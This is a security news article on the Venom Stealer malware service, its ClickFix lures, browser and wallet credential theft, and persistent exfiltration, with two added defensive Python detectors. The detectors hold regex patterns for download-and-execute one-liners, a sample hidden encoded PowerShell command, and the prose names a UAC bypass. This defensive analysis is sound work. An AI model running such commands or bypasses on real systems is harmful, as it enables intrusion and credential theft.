Hackers Use Venom Stealer to Turn ClickFix Lures Into Full Data Exfiltration Pipelines

A new malware has been quietly spreading across cybercrime networks, and security researchers say it is far more capable than most tools of its kind.

Called Venom Stealer, this malware-as-a-service platform does not just harvest credentials. It packages an entire automated attack chain that begins with a simple social engineering trick and ends with the bulk theft of the victim's browser data and the draining of any cryptocurrency wallets the payload can find.

Most credential stealers work in a straightforward way: infect a machine, grab passwords, send them off, and disappear. Venom Stealer operates very differently.

It embeds ClickFix social engineering directly into its operator panel, automates every stage of the attack from initial access through data theft, and keeps the exfiltration pipeline running well after the first payload completes.

The researchers argue that this makes it significantly more dangerous than commodity stealers such as Lumma, Vidar and RedLine, which typically stop at credential harvesting and do not maintain access after the initial infection.

BlackFog analysts identified this threat after tracking its activity closely on underground cybercrime forums.

The developer, operating under the handle “VenomStealer,” offers access through a subscription model priced between $250 per month and $1,800 for a lifetime license.

The platform includes Telegram-based licensing, a 15% affiliate program, and a native C++ binary payload compiled separately for each operator through the web panel.

Multiple updates shipped in March 2026 alone, which strongly suggests this is a full-time criminal operation with active development.

[Figure: Venom Stealer's advertisement (Source: BlackFog)]

The attack starts when a target visits a ClickFix page controlled by the operator. Venom provides four ready-made templates for both Windows and macOS — a fake Cloudflare CAPTCHA, a fake operating system update, a fake SSL certificate error, and a fake font installation page.

[Figure: Fake Cloudflare CAPTCHA template (Source: BlackFog)]

Each template walks the victim through opening the Run dialog (Win+R) on Windows or a Terminal window on macOS, pasting the command the page supplies, and pressing Enter.

[Figure: The Windows ClickFix delivery panel (Source: BlackFog)]

Because the victim launches the command, its parent process is explorer.exe (the host of the Run dialog) or the user's shell under Terminal on macOS, rather than a browser or an Office application, so detections keyed on document- or browser-spawned shells do not fire. The activity is not invisible, though: on Windows the pasted text is recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, and an interpreter started from explorer.exe with an encoded or download-and-execute command line is itself a strong signal.

[Figure: The macOS ClickFix delivery panel (Source: BlackFog)]
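A process-creation triage that encodes the parent-process logic described above, added here as an example and not code from BlackFog or from the malware: it scores Sysmon-style Event ID 1 records, treating an interpreter launched from explorer.exe as the Run-dialog signature and adding weight for the argument patterns ClickFix one-liners rely on. The event records, the base64 blob and the indicator list are constructed for illustration.

```python
"""ClickFix process-creation triage over Sysmon-style Event ID 1 records.

Added example; the records below are constructed to resemble Sysmon Event 1
fields (Image, ParentImage, CommandLine, User) and are not real telemetry.
"""
import re
from dataclasses import dataclass

# Interpreters a pasted ClickFix command typically lands in on Windows.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "curl.exe", "bitsadmin.exe", "certutil.exe"}

# The Run dialog is hosted by explorer.exe, so a user-pasted command has explorer.exe
# as its parent; browser->shell and Office->shell rules never see it.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Argument traits of copy-pasted one-liners (assumed indicators chosen for illustration).
SUSPICIOUS_ARGS = [
    re.compile(r"-(encodedcommand|enc|e)\s+[A-Za-z0-9+/=]{20,}", re.I),   # base64 payload
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),                        # hide the console
    re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),                  # policy is not a boundary
    re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I),
    re.compile(r"mshta(\.exe)?\s+https?://", re.I),                       # remote HTA
    re.compile(r"\bcurl\b[^|]*\|\s*(sh|bash|zsh)\b", re.I),               # macOS Terminal variant
]


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: dict) -> Finding:
    """One point for the Run-dialog parent signature, one per suspicious argument pattern."""
    reasons = []
    image, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    if image in SHELL_IMAGES and parent in RUN_DIALOG_PARENTS:
        reasons.append(f"{image} started from {parent} (Run dialog signature)")
    for pat in SUSPICIOUS_ARGS:
        if pat.search(cmd):
            reasons.append(f"command line matches /{pat.pattern}/")
    return Finding(ev["ProcessId"], len(reasons), reasons)


def triage(events, threshold: int = 2):
    """Keep events that combine the parent signature with at least one argument indicator
    (or stack several indicators); a bare admin console from explorer.exe scores 1 and drops."""
    return [f for f in (score_event(e) for e in events) if f.score >= threshold]


# Constructed sample telemetry (not from the article). The base64 blob is a placeholder.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe",
     "CommandLine": "powershell -w hidden -ep bypass -enc "
                    "aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"ProcessId": 4130, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\admin",
     "CommandLine": "powershell"},                       # admin opening a console by hand
    {"ProcessId": 4140, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": "CORP\\jdoe",
     "CommandLine": "mshta https://cdn.example.invalid/verify.hta"},
    {"ProcessId": 4150, "Image": r"C:\Program Files\Git\bin\bash.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe", "User": "CORP\\dev",
     "CommandLine": "bash -c 'git status'"},             # developer tooling, benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"PID {f.pid} score={f.score}")
        for r in f.reasons:
            print("   -", r)
```

The threshold of two keeps an administrator who simply opens PowerShell from the Run dialog out of the alert queue while still catching the paste-and-Enter pattern; pair it with the RunMRU key when reconstructing exactly what the victim pasted.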

Once the payload runs, it immediately sweeps every Chromium- and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.

Both of Chrome's password formats are handled: v10, where the key is protected by the user's DPAPI, and v20, the App-Bound Encryption format whose key Chrome wraps with system-level DPAPI so that a process running as the user cannot unwrap it directly. To reach the v20 key the payload elevates silently by abusing the auto-elevating CMSTPLUA COM object, a long-known UAC bypass, and recovers the key without a UAC prompt. BlackFog describes this as leaving no forensic trace; more precisely, it leaves no prompt for the victim to notice. The bypass only works when the logged-on user is a local administrator, and the elevated process still appears in process-creation telemetry.

System fingerprinting and browser extension inventories are also collected, giving attackers a thorough profile of each victim before the stolen data is sent off the device.

Persistence and the Continuous Exfiltration Window

What separates Venom Stealer from most infostealers is what happens after the initial theft. Rather than running once and exiting, Venom stays resident on the compromised machine and continuously monitors Chrome's Login Data file (the SQLite database that holds saved logins in each profile), capturing any credential saved after the infection begins.

This session listener polls the file every 30 seconds. If a victim resets passwords after an incident and lets Chrome save the new ones on the still-infected machine, the replacements reach the operator within one polling interval, so rotating credentials before the implant is removed only hands the attacker the new set.

[Figure: Session listener lifecycle (Source: BlackFog)]

Any cryptocurrency wallet data discovered is sent to a server-side GPU cracking engine, which brute-forces the vault passwords and drains wallets across nine blockchain networks, targeting wallet software such as MetaMask, Phantom, Exodus and Electrum.

A March 9 update added a File Password and Seed Finder that scans the local filesystem for seed phrases, putting users at risk even if they never saved credentials directly inside a browser.

This means the exfiltration window does not close — it continues running and collecting more data as time passes.

Organizations can reduce their exposure to threats like this by restricting PowerShell execution policies, removing the Run dialog for standard user accounts through Group Policy (the "Remove Run menu from Start Menu" policy, which sets the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer), and training employees to recognise ClickFix-style pages. Two caveats apply. Execution policy is not a security boundary: a pasted one-liner can pass -ExecutionPolicy Bypass or an encoded command, and nothing forces the lure to use PowerShell at all, so application control (AppLocker or WDAC) on user-writable paths does far more than the policy setting. Removing the Run dialog likewise closes only one entry point; a victim can still paste the same text into a command prompt or, on macOS, into Terminal.

Since the attack relies entirely on data leaving the device, monitoring and controlling outbound network traffic is a critical defensive step that can detect or interrupt exfiltration before significant damage is done. In practice that means alerting on outbound connections from unsigned binaries in user-writable directories and on traffic that recurs on a fixed timer, and blocking egress that the host does not need.
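As an added example serving both the session-listener description above and the outbound-monitoring advice, and not code from the article, from BlackFog or from the malware: a cadence check over Sysmon-style Event ID 3 (NetworkConnect) records that flags any process-and-destination pair whose connections recur on a tight timer. The sample records are constructed; the 30 s period mirrors the article's polling interval, but the article does not say the implant uploads at that same cadence, so the period and the thresholds are assumptions chosen for illustration.

```python
"""Cadence analysis of outbound connections to surface a long-lived exfiltration loop.

Added example. Records are constructed to resemble Sysmon Event ID 3 fields
(UtcTime, Image, DestinationIp, DestinationPort); none of them are real telemetry.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

MIN_CONNECTIONS = 6   # need a few repeats before calling anything periodic (assumed)
MAX_JITTER = 0.25     # stdev/mean of the gaps; a timer-driven loop scores near 0 (assumed)


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def group_connections(events):
    """Key connections by (process name, destination ip, port) with sorted timestamps."""
    groups = defaultdict(list)
    for ev in events:
        key = (ev["Image"].rsplit("\\", 1)[-1].lower(), ev["DestinationIp"], ev["DestinationPort"])
        groups[key].append(parse_time(ev["UtcTime"]))
    return {k: sorted(v) for k, v in groups.items()}


def cadence(timestamps):
    """Return (mean gap in seconds, jitter ratio) for a sorted series, or None if too short."""
    if len(timestamps) < MIN_CONNECTIONS:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    m = mean(gaps)
    if m <= 0:
        return None
    return m, pstdev(gaps) / m


def find_beacons(events, max_jitter: float = MAX_JITTER):
    """Flag tuples whose connections recur on a regular period; sorted by period."""
    hits = []
    for key, ts in group_connections(events).items():
        c = cadence(ts)
        if c and c[1] <= max_jitter:
            hits.append({"process": key[0], "dst": f"{key[1]}:{key[2]}",
                         "period_s": round(c[0], 1), "jitter": round(c[1], 3)})
    return sorted(hits, key=lambda h: h["period_s"])


def _series(image, ip, port, start, gaps):
    """Build a constructed connection series: one record at `start`, then one per gap."""
    t, out = parse_time(start), []
    for g in [0] + gaps:
        t += timedelta(seconds=g)
        out.append({"UtcTime": t.strftime("%Y-%m-%d %H:%M:%S"), "Image": image,
                    "DestinationIp": ip, "DestinationPort": port})
    return out


# Constructed sample telemetry. The implant name and addresses are placeholders.
SAMPLE_EVENTS = (
    _series(r"C:\Users\jdoe\AppData\Local\Temp\WinUpdHelper.exe", "203.0.113.10", 443,
            "2026-03-12 09:00:00", [30, 31, 29, 30, 30, 31, 30])       # timer-driven loop
    + _series(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "198.51.100.5", 443,
              "2026-03-12 09:00:05", [3, 120, 7, 340, 15, 60, 900])    # human browsing
    + _series(r"C:\Windows\System32\svchost.exe", "192.0.2.20", 80,
              "2026-03-12 09:00:10", [600, 600])                       # too few to judge
)

if __name__ == "__main__":
    for h in find_beacons(SAMPLE_EVENTS):
        print(f"{h['process']} -> {h['dst']} every ~{h['period_s']}s (jitter {h['jitter']})")
```

Cadence alone will also flag legitimate keepalives and updaters, so weight the result by where the binary lives and whether it is signed; conversely, an operator who adds random sleep to the upload loop pushes the jitter ratio up, which is why the threshold should be tuned against your own baseline rather than fixed at 0.25.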

The post Hackers Use Venom Stealer to Turn ClickFix Lures Into Full Data Exfiltration Pipelines appeared first on Cyber Security News.

Source: cybersecuritynews.com
